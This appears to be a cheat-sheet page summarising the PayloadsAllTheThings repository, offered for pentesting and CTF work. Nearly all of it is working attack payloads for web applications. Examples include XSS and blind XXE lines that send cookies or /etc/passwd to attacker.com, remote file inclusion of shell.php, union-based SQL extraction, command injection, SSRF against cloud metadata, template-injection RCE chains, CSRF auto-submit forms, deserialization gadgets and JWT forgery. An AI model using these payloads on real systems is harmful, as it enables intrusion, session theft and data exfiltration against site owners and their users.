
PayloadsAllTheThings

PayloadsAllTheThings is a massive community-maintained GitHub repository containing attack payloads, security bypasses, and exploitation techniques organized by vulnerability type. Essential reference for pentesting, CTF challenges, and web application security research.

| Path | Purpose |
|---|---|
| /XSS/ | Cross-site scripting payloads (reflected, stored, DOM) |
| /SQL Injection/ | Database injection across engines (MySQL, PostgreSQL, MSSQL, Oracle, SQLite) |
| /Command Injection/ | OS command execution payloads |
| /SSRF/ | Server-side request forgery exploits |
| /XXE/ | XML External Entity attack payloads |
| /Directory Traversal/ | Path traversal and traversal bypass techniques |
| /File Inclusion/ | LFI and RFI exploitation patterns |
| /Server Side Template Injection/ | SSTI payloads across frameworks |
| /CORS/ | Cross-Origin Resource Sharing misconfigurations |
| /CSRF/ | Cross-Site Request Forgery techniques |
| /IDOR/ | Insecure Direct Object Reference patterns |
| /Deserialization/ | Java, PHP, Python deserialization gadgets |
<!-- Basic alert -->
<script>alert('XSS')</script>

<!-- Attribute context -->
"><script>alert('XSS')</script>

<!-- Event handler -->
<img src=x onerror="alert('XSS')">

<!-- Unicode/encoding bypass -->
<script>alert(String.fromCharCode(88,83,83))</script>

<!-- SVG context -->
<svg onload="alert('XSS')">
<!-- Image tag with event -->
<img src=x onerror="fetch('http://attacker.com/steal.php?cookie='+document.cookie)">

<!-- SVG injection -->
<svg/onload="new Image().src='http://attacker.com/log?c='+btoa(document.cookie)">

<!-- HTML5 data attribute -->
<div data-x="`>onclick="eval(this.dataset.x)">Click</div>

<!-- Meta redirect -->
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
// Vulnerable pattern
document.getElementById('output').innerHTML = userInput;

// Payload (if input is: <img src=x onerror="alert('DOM XSS')">)
// Will execute

// Source → Sink patterns
// eval() injection
eval(userInput);  // Payload: alert('XSS')

// setTimeout/setInterval
setTimeout(userInput, 1000);  // Payload: alert('XSS')
-- MySQL: basic union-based
' UNION SELECT 1,2,3,4-- -

-- Extract database name
' UNION SELECT 1,database(),3,4-- -

-- Extract table names
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -

-- Extract columns
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_name='users'-- -

-- Time-based blind
' AND SLEEP(5)-- -
-- MSSQL: basic union
' UNION SELECT 1,2,3,4-- -

-- Extract server version
' UNION SELECT 1,@@version,3,4-- -

-- Extract tables
' UNION SELECT 1,name,3,4 FROM sysobjects WHERE xtype='U'-- -

-- Time-based blind
'; WAITFOR DELAY '00:00:05'-- -
-- PostgreSQL: basic union
' UNION SELECT 1,2,3,4-- -

-- Extract database
' UNION SELECT 1,current_database(),3,4-- -

-- Extract tables
' UNION SELECT 1,tablename,3,4 FROM pg_tables WHERE schemaname='public'-- -

-- Time-based blind
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- -
-- SQLite: basic union
' UNION SELECT 1,2,3,4-- -

-- Extract table names
' UNION SELECT 1,name,3,4 FROM sqlite_master WHERE type='table'-- -

-- Extract columns
' PRAGMA table_info(users);

-- Conditional (error-based) blind; SQLite has no built-in sleep function
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2)) LIMIT 1-- -
# Basic command separators
; ls -la
| whoami
|| id
& cat /etc/passwd
&& whoami

# Pipe to bash
command1 | bash
command1 | sh

# Command substitution
$(whoami)
`whoami`

# Environment variable bypass
${IFS}cat${IFS}/etc/passwd

# Glob patterns
cat /etc/passw*

# Null byte injection (older systems)
cat /etc/passwd%00.txt
# Loopback / local service access
http://127.0.0.1/admin
http://localhost:8080
http://[::1]:80/

# Internal IP ranges
http://10.0.0.1
http://172.16.0.0/12
http://192.168.0.0/16

# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/

# Bypass filters
http://127.1
http://localhost:80/../../admin
http://0.0.0.0

# Obfuscation
http://127.0.0.1:80/ → http://2130706433/
http://127.0.0.1 → http://0x7f.0x0.0x0.0x1
<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>

<!-- Blind XXE with exfiltration -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY exfil SYSTEM "http://attacker.com/log?data=%xxe;">
]>
<data>&exfil;</data>

<!-- Parameter entity injection -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/log?%file;'>">
  %eval;
]>

<!-- DTD external (if not filtered) -->
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">
# Basic traversal
../../../etc/passwd
..\..\..\..\windows\win.ini

# Encoded bypass
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd (double encoding)

# Null byte injection (older systems)
../../../etc/passwd%00.jpg

# Backslash bypass
..\..\..\etc\passwd

# Overlong UTF-8
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

# URL encoding variations
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
# Basic LFI
?page=../../../../etc/passwd
?file=....//....//....//etc//passwd

# Log poisoning (access logs, error logs)
?page=../../../var/log/apache2/access.log

# PHP wrappers
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://input (POST data execution)
?file=data:text/plain,<?php phpinfo(); ?>

# Expect wrapper
?file=expect://whoami
# Basic RFI
?page=http://attacker.com/shell.php
?file=http://attacker.com/payload.txt

# Protocol smuggling
?file=http://attacker.com/payload.php%00

# FTP protocol
?file=ftp://attacker.com/shell.php
{{ 7 * 7 }}  # Math evaluation
{{ config }}  # Access config
{{ self.__dict__ }}  # Object inspection
{{ ''.__class__.__mro__[1].__subclasses__() }}  # RCE chain
{{ self._TemplateReference__context }}
{{ 7 * 7 }}
{{ _self.env.registerUndefinedFilterCallback("exec")}}
{{ _self.env.getFilter("system")("id") }}
<%= 7 * 7 %>
<%= system("id") %>
<%= `whoami` %>
#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($proc=$rt.getRuntime().exec('id'))
// Vulnerable backend: wildcard origin, or reflects the request's Origin header
Access-Control-Allow-Origin: *
// Or
Access-Control-Allow-Origin: [user-supplied]

// Exploit patterns
// 1. Wildcard origin
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true  // Invalid combination: browsers reject credentialed responses with a wildcard origin

// 2. Null origin bypass
Access-Control-Allow-Origin: null

// 3. Subdomain bypass
Origin: attacker.victim.com
// Server accepts: *.victim.com

// 4. Regex bypass
Origin: victim.com.attacker.com
// Server regex: victim.com (unanchored, so it matches anywhere in the Origin value)
<!-- Image tag (GET request) -->
<img src="http://target.com/admin/delete?id=1">

<!-- Form submission (POST) -->
<form action="http://target.com/admin/delete" method="POST">
  <input type="hidden" name="id" value="1">
  <input type="submit">
</form>
<script>document.forms[0].submit();</script>

<!-- Fetch request -->
<script>
fetch('http://target.com/admin/delete', {
  method: 'POST',
  credentials: 'include',
  body: 'id=1'
});
</script>

<!-- XMLHttpRequest -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/admin/delete', true);
xhr.withCredentials = true;
xhr.send('id=1');
</script>
# Sequential ID enumeration
/api/users/1
/api/users/2
/api/users/3

# Parameter manipulation
/profile?id=100  → /profile?id=101, 102, 103...

# Hash/token prediction
/invoice?token=abc123  → /invoice?token=abc124...

# UUID/GUID patterns
/documents/550e8400-e29b-41d4-a716-446655440000
# Increment least significant digits

# Encoded ID manipulation
/user?id=MQ%3D%3D  (base64: MQ== = 1)
# Try MQ%3D%3D, Mi%3D%3D, Mw%3D%3D...

# Horizontal escalation
/api/orders/my-orders  (returns user 1's orders)
# Bypass: /api/orders/other-user-id/orders
# Generate payload with ysoserial
java -jar ysoserial.jar CommonsCollections5 'command' | base64

# Common gadget chains
CommonsCollections
CommonsCollections5
CommonsCollections6
Spring1
Spring2
JRMP
JMXBean
// PHP: vulnerable pattern
unserialize($_GET['data']);

// Gadget-based RCE
O:4:"Test":2:{s:4:"func";s:6:"system";s:3:"arg";s:2:"id";}

// Magic method exploitation
__wakeup()
__destruct()
__toString()
__get()
__set()
# Python: vulnerable pattern
pickle.loads(user_data)

# RCE gadget
import pickle, subprocess
payload = pickle.dumps(subprocess.Popen(['id']))
// 1. Unsigned token ('none' algorithm)
// Modify header: {"alg":"none","typ":"JWT"}
// Signature: empty

// 2. Weak signature
// Crack with: hashcat, john, jwt-cracker

// 3. Public key injection
// If server uses asymmetric, swap with public key

// 4. Algorithm confusion (RS256 → HS256)
// Modify alg from RS256 to HS256, use public cert as HMAC key

// 5. Expired token bypass
// Modify exp claim

// Example modified JWT
eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIn0.
# Extension bypass
file.php → file.php.jpg
file.php → file.jpg.php
file.php → file.phtml
file.php → file.php5
file.php → file.shtml

# MIME type bypass
Actual file: PHP shell
MIME header: image/jpeg

# Double extension
file.php.jpg
file.jpg.php

# Null byte injection (older systems)
file.php%00.jpg

# Case variation
file.PhP
file.pHp

# Content-Type header manipulation
Content-Type: image/jpeg  (for PHP file)

# Image polyglot
# Valid JPEG + PHP code appended
# Basic LDAP injection
cn=admin*)(uid=*))(&(uid=*
# Filter becomes: (&(cn=admin*)(uid=*))(&(uid=*)(password=*))

# Wildcard bypass
cn=*
uid=*
mail=*

# Blind LDAP injection
cn=admin)(|(uid=*))(&(uid=*)
# Bypass authentication

# Time-based blind
cn=admin)(|(cn=*&(objectclass=*))
// String concatenation injection
db.users.find({username: "' + username + '", password: "' + password + '"})
// Payload: {"$ne": null}
// Query becomes: {username: {$ne: null}, password: {$ne: null}}

// Operator injection
username: {$gt: ""}
password: {$gt: ""}

// JavaScript evaluation
db.users.find({$where: "this.username == '" + username + "'"})
// Payload: ' || '1'=='1

// Aggregation pipeline injection
db.collection.aggregate([{$match: {username: userInput}}])
// CouchDB Mango query injection
{"selector": {"username": {"$eq": userInput}}}
// Payload: {"$gt": null}

// Map/reduce injection
_design/users/_view/all?key={"username":"admin"}
# Parameter-based
?redirect=http://attacker.com
?next=http://attacker.com
?url=http://attacker.com
?return=http://attacker.com

# Whitelist bypass
?redirect=http://legitsite.com.attacker.com
?redirect=http://attacker.com@legitsite.com
?redirect=http://attacker.com#@legitsite.com
?redirect=//attacker.com  (protocol-relative URL)

# Unicode/encoding bypass
?redirect=http://%61%74%74%61%63%6b%65%72.com
?redirect=http://attacker.com%00legitsite.com

# JavaScript protocol
?redirect=javascript:alert('XSS')
  • GitHub: https://github.com/swisskyrepo/PayloadsAllTheThings
  • Regular Updates: Community maintains current bypasses and techniques
  • Local Mirror: Clone for offline reference during assessments
  • Search: Use repository search to find payloads by vulnerability type
  • Always test in authorized environments only
  • Understand the payload before using it
  • Combine techniques for maximum effectiveness
  • Keep the repository updated regularly
  • Document payloads used in your assessments
  • Modify payloads for target-specific contexts
  • Validate findings with proper exploitation steps